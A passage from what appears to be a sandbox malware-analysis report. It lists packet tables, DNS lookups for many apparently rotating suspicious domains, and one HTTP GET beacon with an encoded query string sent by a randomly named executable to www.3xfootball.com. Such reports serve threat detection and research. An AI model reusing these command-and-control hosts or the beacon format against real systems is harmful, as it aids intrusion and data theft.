Jan 9, 2025 09:42:28.681799889 CET	61293	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:29.711889982 CET	61294	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:29.716861010 CET	80	61294	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:29.723929882 CET	61294	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:29.731842041 CET	61294	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:29.736670017 CET	80	61294	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:31.238837004 CET	61294	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:31.244259119 CET	80	61294	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:31.244332075 CET	61294	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:32.259835958 CET	61295	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:32.264704943 CET	80	61295	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:32.264914036 CET	61295	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:32.267832994 CET	61295	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:32.272597075 CET	80	61295	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:32.272718906 CET	80	61295	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:33.770098925 CET	61295	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:33.775214911 CET	80	61295	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:33.775938034 CET	61295	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:34.789455891 CET	61296	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:34.794384956 CET	80	61296	85.159.66.93	192.168.2.7
Jan 9, 2025 09:42:34.794464111 CET	61296	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:34.797051907 CET	61296	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:42:34.801862001 CET	80	61296	85.159.66.93	192.168.2.7
Jan 9, 2025 09:43:35.510831118 CET	80	61296	85.159.66.93	192.168.2.7
Jan 9, 2025 09:43:35.511079073 CET	80	61296	85.159.66.93	192.168.2.7
Jan 9, 2025 09:43:35.511136055 CET	61296	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:43:35.513886929 CET	61296	80	192.168.2.7	85.159.66.93
Jan 9, 2025 09:43:35.518630981 CET	80	61296	85.159.66.93	192.168.2.7
Jan 9, 2025 09:43:40.564265013 CET	61297	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:40.569076061 CET	80	61297	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:40.571043968 CET	61297	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:40.573947906 CET	61297	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:40.578699112 CET	80	61297	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:41.213742971 CET	80	61297	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:41.213804960 CET	80	61297	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:41.213855028 CET	61297	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:42.083120108 CET	61297	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:43.108542919 CET	61298	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:43.114557028 CET	80	61298	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:43.114625931 CET	61298	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:43.116676092 CET	61298	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:43.122509003 CET	80	61298	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:43.752017975 CET	80	61298	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:43.752101898 CET	80	61298	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:43.756086111 CET	61298	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:44.630834103 CET	61298	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:45.648065090 CET	61299	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:45.652970076 CET	80	61299	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:45.653062105 CET	61299	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:45.655085087 CET	61299	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:45.659948111 CET	80	61299	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:45.660029888 CET	80	61299	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:46.301734924 CET	80	61299	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:46.301765919 CET	80	61299	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:46.301986933 CET	61299	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:47.161082029 CET	61299	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.179693937 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.184673071 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.188081026 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.189817905 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.194648981 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877037048 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877063036 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877074957 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877125978 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877136946 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877146959 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877157927 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877170086 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877180099 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877192020 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.877194881 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.877248049 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.881983995 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.882004023 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.882081032 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.949299097 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949316025 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949417114 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949436903 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949448109 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949451923 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.949465036 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949476957 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.949490070 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.949513912 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.950268984 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.950297117 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.950310946 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.950603008 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:43:48.950654030 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.959616899 CET	61300	80	192.168.2.7	91.195.240.94
Jan 9, 2025 09:43:48.964396954 CET	80	61300	91.195.240.94	192.168.2.7
Jan 9, 2025 09:44:02.222400904 CET	61301	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:02.227255106 CET	80	61301	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:02.227435112 CET	61301	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:02.229307890 CET	61301	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:02.234117985 CET	80	61301	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:02.857121944 CET	80	61301	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:02.857613087 CET	80	61301	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:02.857666016 CET	61301	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:03.739217043 CET	61301	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:04.759998083 CET	61302	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:04.764974117 CET	80	61302	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:04.768034935 CET	61302	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:04.770037889 CET	61302	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:04.774867058 CET	80	61302	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:05.376526117 CET	80	61302	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:05.376698971 CET	80	61302	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:05.376908064 CET	61302	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:06.286264896 CET	61302	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:07.311045885 CET	61303	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:07.315924883 CET	80	61303	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:07.315989017 CET	61303	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:07.321053028 CET	61303	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:07.325882912 CET	80	61303	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:07.326051950 CET	80	61303	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:07.941158056 CET	80	61303	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:07.941226006 CET	80	61303	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:07.941904068 CET	61303	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:08.833168983 CET	61303	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:09.852046967 CET	61304	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:09.857103109 CET	80	61304	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:09.859900951 CET	61304	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:09.859900951 CET	61304	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:09.864734888 CET	80	61304	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:10.468795061 CET	80	61304	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:10.468842983 CET	80	61304	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:10.472791910 CET	61304	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:10.472791910 CET	61304	80	192.168.2.7	66.29.149.46
Jan 9, 2025 09:44:10.477688074 CET	80	61304	66.29.149.46	192.168.2.7
Jan 9, 2025 09:44:15.563596964 CET	61305	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:15.568595886 CET	80	61305	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:15.568696976 CET	61305	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:15.570766926 CET	61305	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:15.575587034 CET	80	61305	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:16.268356085 CET	80	61305	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:16.268728971 CET	80	61305	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:16.272080898 CET	61305	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:17.083025932 CET	61305	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:18.102025032 CET	61306	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:18.106993914 CET	80	61306	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:18.108959913 CET	61306	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:18.108959913 CET	61306	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:18.113796949 CET	80	61306	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:18.776196003 CET	80	61306	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:18.776667118 CET	80	61306	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:18.782058001 CET	61306	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:19.614458084 CET	61306	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:20.636023045 CET	61307	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:20.641031981 CET	80	61307	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:20.644171000 CET	61307	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:20.648029089 CET	61307	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:20.652911901 CET	80	61307	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:20.652985096 CET	80	61307	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:21.331037998 CET	80	61307	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:21.331175089 CET	80	61307	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:21.331235886 CET	61307	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:22.161329985 CET	61307	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:23.180990934 CET	61308	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:23.185966969 CET	80	61308	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:23.186043978 CET	61308	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:23.188357115 CET	61308	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:23.193114042 CET	80	61308	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:23.857021093 CET	80	61308	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:23.857434034 CET	80	61308	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:23.862633944 CET	61308	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:23.862633944 CET	61308	80	192.168.2.7	195.110.124.133
Jan 9, 2025 09:44:23.867435932 CET	80	61308	195.110.124.133	192.168.2.7
Jan 9, 2025 09:44:45.304795980 CET	61309	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:45.309652090 CET	80	61309	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:45.309720039 CET	61309	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:45.311732054 CET	61309	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:45.316505909 CET	80	61309	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:45.872419119 CET	80	61309	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:45.872924089 CET	80	61309	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:45.880073071 CET	61309	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:46.820064068 CET	61309	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:47.836452007 CET	61310	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:47.841267109 CET	80	61310	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:47.841355085 CET	61310	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:47.843164921 CET	61310	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:47.847954988 CET	80	61310	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:48.410559893 CET	80	61310	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:48.410927057 CET	80	61310	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:48.412205935 CET	61310	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:49.348834038 CET	61310	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:50.367723942 CET	61311	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:50.372587919 CET	80	61311	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:50.376140118 CET	61311	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:50.380079031 CET	61311	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:50.384852886 CET	80	61311	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:50.385039091 CET	80	61311	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:50.934253931 CET	80	61311	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:50.934705019 CET	80	61311	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:50.934758902 CET	61311	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:51.884077072 CET	61311	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:52.900355101 CET	61312	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:52.905272961 CET	80	61312	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:52.905350924 CET	61312	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:52.907601118 CET	61312	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:52.912362099 CET	80	61312	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:53.483264923 CET	80	61312	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:53.483278990 CET	80	61312	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:53.483319044 CET	80	61312	217.196.55.202	192.168.2.7
Jan 9, 2025 09:44:53.483406067 CET	61312	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:53.483436108 CET	61312	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:53.486711979 CET	61312	80	192.168.2.7	217.196.55.202
Jan 9, 2025 09:44:53.491473913 CET	80	61312	217.196.55.202	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 09:41:35.686528921 CET	60384	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:36.676337957 CET	60384	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:36.682869911 CET	53	60384	1.1.1.1	192.168.2.7
Jan 9, 2025 09:41:39.257895947 CET	53	60384	1.1.1.1	192.168.2.7
Jan 9, 2025 09:41:56.929753065 CET	52502	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:41:56.939431906 CET	53	52502	1.1.1.1	192.168.2.7
Jan 9, 2025 09:42:04.992034912 CET	63406	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:42:05.356157064 CET	53	63406	1.1.1.1	192.168.2.7
Jan 9, 2025 09:42:18.851959944 CET	59614	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:42:18.861665010 CET	53	59614	1.1.1.1	192.168.2.7
Jan 9, 2025 09:42:26.917134047 CET	57748	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:42:27.038789034 CET	53	57748	1.1.1.1	192.168.2.7
Jan 9, 2025 09:43:40.523626089 CET	52704	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:43:40.560132980 CET	53	52704	1.1.1.1	192.168.2.7
Jan 9, 2025 09:43:53.979978085 CET	50646	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:43:53.988823891 CET	53	50646	1.1.1.1	192.168.2.7
Jan 9, 2025 09:44:02.056000948 CET	57376	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:44:02.219005108 CET	53	57376	1.1.1.1	192.168.2.7
Jan 9, 2025 09:44:15.478665113 CET	64630	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:44:15.561090946 CET	53	64630	1.1.1.1	192.168.2.7
Jan 9, 2025 09:44:28.869617939 CET	49839	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:44:28.904325962 CET	53	49839	1.1.1.1	192.168.2.7
Jan 9, 2025 09:44:36.963273048 CET	50603	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:44:37.167294979 CET	53	50603	1.1.1.1	192.168.2.7
Jan 9, 2025 09:44:45.244575977 CET	52425	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:44:45.301697969 CET	53	52425	1.1.1.1	192.168.2.7
Jan 9, 2025 09:44:58.496087074 CET	56771	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:44:58.523660898 CET	53	56771	1.1.1.1	192.168.2.7
Jan 9, 2025 09:45:06.586580992 CET	56969	53	192.168.2.7	1.1.1.1
Jan 9, 2025 09:45:06.595751047 CET	53	56969	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 09:41:35.686528921 CET	192.168.2.7	1.1.1.1	0x7ab7	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:41:36.676337957 CET	192.168.2.7	1.1.1.1	0x7ab7	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:41:36.688319921 CET	192.168.2.7	1.1.1.1	0x1	Standard query (0)	www.3xfootball.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:41:56.929753065 CET	192.168.2.7	1.1.1.1	0xe017	Standard query (0)	www.kasegitai.tokyo	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:42:04.992034912 CET	192.168.2.7	1.1.1.1	0x644	Standard query (0)	www.goldenjade-travel.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:42:18.851959944 CET	192.168.2.7	1.1.1.1	0x5214	Standard query (0)	www.antonio-vivaldi.mobi	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:42:26.917134047 CET	192.168.2.7	1.1.1.1	0xedb0	Standard query (0)	www.magmadokum.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:43:40.523626089 CET	192.168.2.7	1.1.1.1	0xa49e	Standard query (0)	www.rssnewscast.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:43:53.979978085 CET	192.168.2.7	1.1.1.1	0xbf56	Standard query (0)	www.liangyuen528.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:02.056000948 CET	192.168.2.7	1.1.1.1	0x236b	Standard query (0)	www.techchains.info	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:15.478665113 CET	192.168.2.7	1.1.1.1	0xb3af	Standard query (0)	www.elettrosistemista.zip	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:28.869617939 CET	192.168.2.7	1.1.1.1	0x46e3	Standard query (0)	www.donnavariedades.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:36.963273048 CET	192.168.2.7	1.1.1.1	0x15b8	Standard query (0)	www.660danm.top	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:45.244575977 CET	192.168.2.7	1.1.1.1	0x3b1d	Standard query (0)	www.empowermedeco.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:58.496087074 CET	192.168.2.7	1.1.1.1	0x9a1b	Standard query (0)	www.joyesi.xyz	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:45:06.586580992 CET	192.168.2.7	1.1.1.1	0x9624	Standard query (0)	www.k9vyp11no3.cfd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 09:41:39.257895947 CET	1.1.1.1	192.168.2.7	0x7ab7	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:41:40.872210026 CET	1.1.1.1	192.168.2.7	0x1	No error (0)	www.3xfootball.com		154.215.72.110	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:41:56.939431906 CET	1.1.1.1	192.168.2.7	0xe017	Name error (3)	www.kasegitai.tokyo	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:42:05.356157064 CET	1.1.1.1	192.168.2.7	0x644	No error (0)	www.goldenjade-travel.com		116.50.37.244	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:42:18.861665010 CET	1.1.1.1	192.168.2.7	0x5214	Name error (3)	www.antonio-vivaldi.mobi	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:42:27.038789034 CET	1.1.1.1	192.168.2.7	0xedb0	No error (0)	www.magmadokum.com	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 09:42:27.038789034 CET	1.1.1.1	192.168.2.7	0xedb0	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 09:42:27.038789034 CET	1.1.1.1	192.168.2.7	0xedb0	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:43:40.560132980 CET	1.1.1.1	192.168.2.7	0xa49e	No error (0)	www.rssnewscast.com		91.195.240.94	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:43:53.988823891 CET	1.1.1.1	192.168.2.7	0xbf56	Name error (3)	www.liangyuen528.com	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:02.219005108 CET	1.1.1.1	192.168.2.7	0x236b	No error (0)	www.techchains.info		66.29.149.46	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:15.561090946 CET	1.1.1.1	192.168.2.7	0xb3af	No error (0)	www.elettrosistemista.zip	elettrosistemista.zip		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 09:44:15.561090946 CET	1.1.1.1	192.168.2.7	0xb3af	No error (0)	elettrosistemista.zip		195.110.124.133	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:28.904325962 CET	1.1.1.1	192.168.2.7	0x46e3	Name error (3)	www.donnavariedades.com	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:37.167294979 CET	1.1.1.1	192.168.2.7	0x15b8	Name error (3)	www.660danm.top	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:45.301697969 CET	1.1.1.1	192.168.2.7	0x3b1d	No error (0)	www.empowermedeco.com	empowermedeco.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 09:44:45.301697969 CET	1.1.1.1	192.168.2.7	0x3b1d	No error (0)	empowermedeco.com		217.196.55.202	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:44:58.523660898 CET	1.1.1.1	192.168.2.7	0x9a1b	Name error (3)	www.joyesi.xyz	none	none	A (IP address)	IN (0x0001)	false
Jan 9, 2025 09:45:06.595751047 CET	1.1.1.1	192.168.2.7	0x9624	Name error (3)	www.k9vyp11no3.cfd	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.3xfootball.com

www.goldenjade-travel.com

www.magmadokum.com

www.rssnewscast.com

www.techchains.info

www.elettrosistemista.zip

www.empowermedeco.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	61204	154.215.72.110	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:41:41.001033068 CET	529	OUT	GET /fo8o/?tjVTF=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnyPSqftK4e48VmHPHqtN0zR7rhi1sr30t/oMfgteNmFfmnntRnM0qQ0ZY&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.3xfootball.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:41:41.875983000 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 09 Jan 2025 08:41:41 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 